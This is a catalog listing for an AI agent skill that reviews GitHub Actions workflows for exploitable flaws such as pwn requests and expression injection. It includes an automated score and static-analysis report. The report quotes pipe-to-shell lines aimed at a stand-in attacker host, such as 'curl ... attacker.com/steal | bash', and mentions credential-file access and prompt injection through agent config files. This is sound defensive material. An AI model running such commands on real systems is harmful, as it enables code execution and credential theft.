Catalog
getsentry/gha-security-review

getsentry

gha-security-review

GitHub Actions security review for workflow exploitation vulnerabilities. Use when asked to "review GitHub Actions", "audit workflows", "check CI security", "GHA security", "workflow security review", or review .github/workflows/ for pwn requests, expression injection, credential theft, and supply chain attacks. Exploitation-focused with concrete PoC scenarios.

global
Allowed Tools
ReadGrepGlobBashTask
New~2.1k
v1.0Saved Jul 11, 2026

GitHub Actions Security Review

Find exploitable vulnerabilities in GitHub Actions workflows. Every finding MUST include a concrete exploitation scenario — if you can't build the attack, don't report it.

This skill encodes attack patterns from real GitHub Actions exploits — not generic CI/CD theory.

Scope

Review the workflows provided (file, diff, or repo). Research the codebase as needed to trace complete attack paths before reporting.

Files to Review

  • .github/workflows/*.yml — all workflow definitions
  • action.yml / action.yaml — composite actions in the repo
  • .github/actions/*/action.yml — local reusable actions
  • Config files loaded by workflows: CLAUDE.md, AGENTS.md, Makefile, shell scripts under .github/

Out of Scope

  • Workflows in other repositories (only note the dependency)
  • GitHub App installation permissions (note if relevant)

Threat Model

Only report vulnerabilities exploitable by an external attacker — someone without write access to the repository. The attacker can open PRs from forks, create issues, and post comments. They cannot push to branches, trigger workflow_dispatch, or trigger manual workflows.

Do not flag vulnerabilities that require write access to exploit:

  • workflow_dispatch input injection — requires write access to trigger
  • Expression injection in push-only workflows on protected branches
  • workflow_call input injection where all callers are internal
  • Secrets in workflow_dispatch/schedule-only workflows

Confidence

Report only HIGH and MEDIUM confidence findings. Do not report theoretical issues.

Confidence Criteria Action
HIGH Traced the full attack path, confirmed exploitable Report with exploitation scenario and fix
MEDIUM Attack path partially confirmed, uncertain link Report as needs verification
LOW Theoretical or mitigated elsewhere Do not report

For each HIGH finding, provide all five elements:

  1. Entry point — How does the attacker get in? (fork PR, issue comment, branch name, etc.)
  2. Payload — What does the attacker send? (actual code/YAML/input)
  3. Execution mechanism — How does the payload run? (expression expansion, checkout + script, etc.)
  4. Impact — What does the attacker gain? (token theft, code execution, repo write access)
  5. PoC sketch — Concrete steps an attacker would follow

If you cannot construct all five, report as MEDIUM (needs verification).


Step 1: Classify Triggers and Load References

For each workflow, identify triggers and load the appropriate reference:

Trigger / Pattern Load Reference
pull_request_target references/pwn-request.md
issue_comment with command parsing references/comment-triggered-commands.md
${{ }} in run: blocks references/expression-injection.md
PATs / deploy keys / elevated credentials references/credential-escalation.md
Checkout PR code + config file loading references/ai-prompt-injection-via-ci.md
Third-party actions (especially unpinned) references/supply-chain.md
permissions: block or secrets usage references/permissions-and-secrets.md
Self-hosted runners, cache/artifact usage references/runner-infrastructure.md
Any confirmed finding references/real-world-attacks.md

Load references selectively — only what's relevant to the triggers found.

Step 2: Check for Vulnerability Classes

Check 1: Pwn Request

Does the workflow use pull_request_target AND check out fork code?

  • Look for actions/checkout with ref: pointing to PR head
  • Look for local actions (./.github/actions/) that would come from the fork
  • Check if any run: step executes code from the checked-out PR

Check 2: Expression Injection

Are ${{ }} expressions used inside run: blocks in externally-triggerable workflows?

  • Map every ${{ }} expression in every run: step
  • Confirm the value is attacker-controlled (PR title, branch name, comment body — not numeric IDs, SHAs, or repository names)
  • Confirm the expression is in a run: block, not if:, with:, or job-level env:

Check 3: Unauthorized Command Execution

Does an issue_comment-triggered workflow execute commands without authorization?

  • Is there an author_association check?
  • Can any GitHub user trigger the command?
  • Does the command handler also use injectable expressions?

Check 4: Credential Escalation

Are elevated credentials (PATs, deploy keys) accessible to untrusted code?

  • What's the blast radius of each secret?
  • Could a compromised workflow steal long-lived tokens?

Check 5: Config File Poisoning

Does the workflow load configuration from PR-supplied files?

  • AI agent instructions: CLAUDE.md, AGENTS.md, .cursorrules
  • Build configuration: Makefile, shell scripts

Check 6: Supply Chain

Are third-party actions securely pinned?

Check 7: Permissions and Secrets

Are workflow permissions minimal? Are secrets properly scoped?

Check 8: Runner Infrastructure

Are self-hosted runners, caches, or artifacts used securely?

Safe Patterns (Do Not Flag)

Before reporting, check if the pattern is actually safe:

Pattern Why Safe
pull_request_target WITHOUT checkout of fork code Never executes attacker code
${{ github.event.pull_request.number }} in run: Numeric only — not injectable
${{ github.repository }} / github.repository_owner Repo owner controls this
${{ secrets.* }} Not an expression injection vector
${{ }} in if: conditions Evaluated by Actions runtime, not shell
${{ }} in with: inputs Passed as string parameters, not shell-evaluated
Actions pinned to full SHA Immutable reference
pull_request trigger (not _target) Runs in fork context with read-only token
Any expression in workflow_dispatch/schedule/push to protected branches Requires write access — outside threat model

Key distinction: ${{ }} is dangerous in run: blocks (shell expansion) but safe in if:, with:, and env: at the job/step level (Actions runtime evaluation).

Step 3: Validate Before Reporting

Before including any finding, read the actual workflow YAML and trace the complete attack path:

  1. Read the full workflow — don't rely on grep output alone
  2. Trace the trigger — confirm the event and check if: conditions that gate execution
  3. Trace the expression/checkout — confirm it's in a run: block or actually references fork code
  4. Confirm attacker control — verify the value maps to something an external attacker sets
  5. Check existing mitigations — env var wrapping, author_association checks, restricted permissions, SHA pinning

If any link is broken, mark MEDIUM (needs verification) or drop the finding.

If no checks produced a finding, report zero findings. Do not invent issues.

Step 4: Report Findings

## GitHub Actions Security Review

### Findings

#### [GHA-001] [Title] (Severity: Critical/High/Medium)
- **Workflow**: `.github/workflows/release.yml:15`
- **Trigger**: `pull_request_target`
- **Confidence**: HIGH — confirmed through attack path tracing
- **Exploitation Scenario**:
  1. [Step-by-step attack]
- **Impact**: [What attacker gains]
- **Fix**: [Code that fixes the issue]

### Needs Verification
[MEDIUM confidence items with explanation of what to verify]

### Reviewed and Cleared
[Workflows reviewed and confirmed safe]

If no findings: "No exploitable vulnerabilities identified. All workflows reviewed and cleared."

Files10
10 files · 72.7 KB

Select a file to preview

Grade adjusted by static analysis guardrails

AI scored this skill as grade A, but static analysis findings capped it to B:

  • Pipe-to-shell pattern (curl/wget piped to sh/bash) (max: B)
  • SSH key or credentials file access (max: B)

Overall Score

87/100

Grade

B

Good

Safety

90

Quality

88

Clarity

85

Completeness

82

Summary

This skill provides comprehensive guidance for identifying exploitable vulnerabilities in GitHub Actions workflows. It teaches agents to review workflow files for attack patterns including pwn requests (pull_request_target + fork checkout), expression injection (${{ }} in run: blocks), unauthorized command execution (issue_comment without auth checks), credential escalation, AI prompt injection via config files, supply chain attacks (unpinned actions), and runner/cache poisoning. The skill emphasizes concrete exploitation scenarios over theoretical issues and grounds findings in real HackerBot Claw campaign attacks.

Static Analysis Findings

7 findings

Patterns detected by deterministic static analysis before AI scoring. Hover over any finding code for detailed information and remediation guidance.

Remote Code Execution
SEC-031Script Download

Dynamic script download for execution

references/supply-chain.mdcurl -sSfL https://example.com/install.sh
Data Exfiltration
SEC-040Outbound Data Transmission3x in 3 files

Outbound data transmission (curl POST/PUT with data)

references/pwn-request.mdcurl -d
references/runner-infrastructure.mdcurl -d
references/credential-escalation.mdcurl -d
Credential Exposure
SEC-020Direct .env File Access2x in 1 file

Direct .env file access

references/runner-infrastructure.md.env2x
SEC-022SSH/Credentials File AccessMax: B

SSH key or credentials file access

references/runner-infrastructure.md~/.ssh/
Command Injection
SEC-010Pipe-to-Shell12x in 5 filesMax: B

Pipe-to-shell pattern (curl/wget piped to sh/bash)

references/comment-triggered-commands.mdcurl -sSfL https://attacker.com/steal | bash
references/expression-injection.mdcurl -sSfL attacker.com/steal | bash
references/pwn-request.mdcurl -sSfL https://attacker.com/steal | bash3x
SEC-011Dynamic Shell Eval

Shell eval/exec of dynamic content

references/pwn-request.mdexec"
Network Access
SEC-060Outbound Network Request6x in 3 files

Outbound network request (curl/wget/fetch)

references/comment-triggered-commands.mdcurl https://
references/expression-injection.mdcurl https://2x
references/runner-infrastructure.mdcurl https://curl http://3x

Detected Capabilities

Read fileGrep/pattern matchingGlob for file discoveryBash for scripting/analysisTask execution for workflow analysis

Trigger Keywords

Phrases that MCP clients use to match this skill to user intent.

github actions security reviewworkflow exploitation auditpwn request detectionexpression injection analysisgithub actions vulnerabilitygha supply chain assessmentci/cd security hardening

Risk Signals

INFO

SEC-010: Pipe-to-shell examples (curl | bash) used throughout reference materials as attack illustrations

references/comment-triggered-commands.md, references/expression-injection.md, references/pwn-request.md, references/real-world-attacks.md, references/supply-chain.md
INFO

SEC-011: Shell exec/eval patterns (exec, command substitution) used as examples of attack payloads in reference materials

references/pwn-request.md, references/expression-injection.md, references/real-world-attacks.md
INFO

SEC-020, SEC-022: .env and ~/.ssh/ access patterns described in runner-infrastructure.md as attack vectors agents should detect

references/runner-infrastructure.md
INFO

SEC-040: curl POST with data exfiltration patterns documented as threat model examples for agent analysis

references/pwn-request.md, references/credential-escalation.md, references/runner-infrastructure.md, references/real-world-attacks.md
INFO

SEC-060: Outbound network requests (curl https://) are documented attack patterns within reference threat models

references/runner-infrastructure.md, multiple references
INFO

SEC-030, SEC-031: Download-and-execute patterns (curl [url] | bash) are core attack mechanisms documented in references as real-world exploit methods

references/real-world-attacks.md, references/supply-chain.md, references/expression-injection.md

Referenced Domains

External domains referenced in skill content, detected by static analysis.

169.254.169.254attacker.comcycode.comdocs.github.comexample.comgithub.bloggithub.comhackmoltrepeat.cominternal-api.corp.example.comrecv.hackmoltrepeat.comsecuritylab.github.comwww.apache.orgwww.aquasec.comwww.stepsecurity.io

Use Cases

  • Review GitHub Actions workflows for external attacker exploit paths
  • Audit CI/CD pipelines for expression injection and pwn request vulnerabilities
  • Identify credential escalation risks in fork-triggered workflows
  • Validate GitHub Actions workflow permissions and secret scoping
  • Assess supply chain risks from third-party actions and unpinned dependencies
  • Analyze self-hosted runner security in multi-workflow CI/CD systems

Quality Notes

  • STRENGTH: Skill is grounded in 7 real, documented attacks from HackerBot Claw campaign (Feb-Mar 2025). Calibration against real-world precedent is exceptionally strong.
  • STRENGTH: Eight comprehensive reference documents covering discrete vulnerability classes: pwn requests, expression injection, comment-triggered commands, credential escalation, AI prompt injection, supply chain, permissions/secrets, runner infrastructure. Each reference includes detection patterns, exploitation templates, and concrete fixes.
  • STRENGTH: Clear threat model explicitly defined — targets external attackers (no write access) and lists out-of-scope patterns (workflow_dispatch, protected branch push, etc.). Prevents false positives from internal threats.
  • STRENGTH: Confidence threshold enforced: only HIGH and MEDIUM findings reported, with explicit five-element requirements (entry point, payload, execution mechanism, impact, PoC sketch) for HIGH confidence. Systematic validation step before reporting.
  • STRENGTH: Safe pattern reference table in SKILL.md clearly documents when expressions are safe (${{ }} in if:/with:, numeric-only values, secrets, job-level env), preventing over-flagging of harmless patterns.
  • STRENGTH: Detection patterns provided for each vulnerability class in reference materials, easing automation and scripting.
  • STRENGTH: Each real-world attack documented with indicators (execution timing gaps, log evidence, post-compromise actions), teaching agent what to look for in build artifacts.
  • STRENGTH: Workflow-splitting pattern demonstrated (build on pull_request with read-only token, deploy on workflow_run with secrets) as canonical fix.
  • WEAKNESS: Skill does not include a canonical checklist or output template in the main body for consistency. Each reviewer might structure findings differently. Could benefit from a formal reporting template beyond the Step 4 example.
  • WEAKNESS: The skill is read-only (no file writes), which aligns with safe design, but does not explain how to auto-remediate common findings (e.g., adding permissions: blocks, converting tags to SHAs).
  • WEAKNESS: No guidance on prioritizing findings across multiple workflows in a large repo. If a repo has 50 workflows with mixed severity findings, how should review be sequenced?
  • WEAKNESS: Reference materials use attacker.com, example.com, and hackmoltrepeat.com as placeholder domains in examples. Real-world attackers in HackerBot used recv.hackmoltrepeat.com and hackmoltrepeat.com. Could be slightly clearer that example.com in references is a template, not the actual attacker domain.
  • QUALITY: Markdown formatting is clean, tables are used effectively, code blocks are clearly marked, hierarchical structure is logical and easy to navigate.
Model: claude-haiku-4-5-20251001Analyzed: Jul 11, 2026

Reviews

Add this skill to your library to leave a review.

No reviews yet

Be the first to share your experience.

Add getsentry/gha-security-review to your library

Command Palette

Search for a command to run...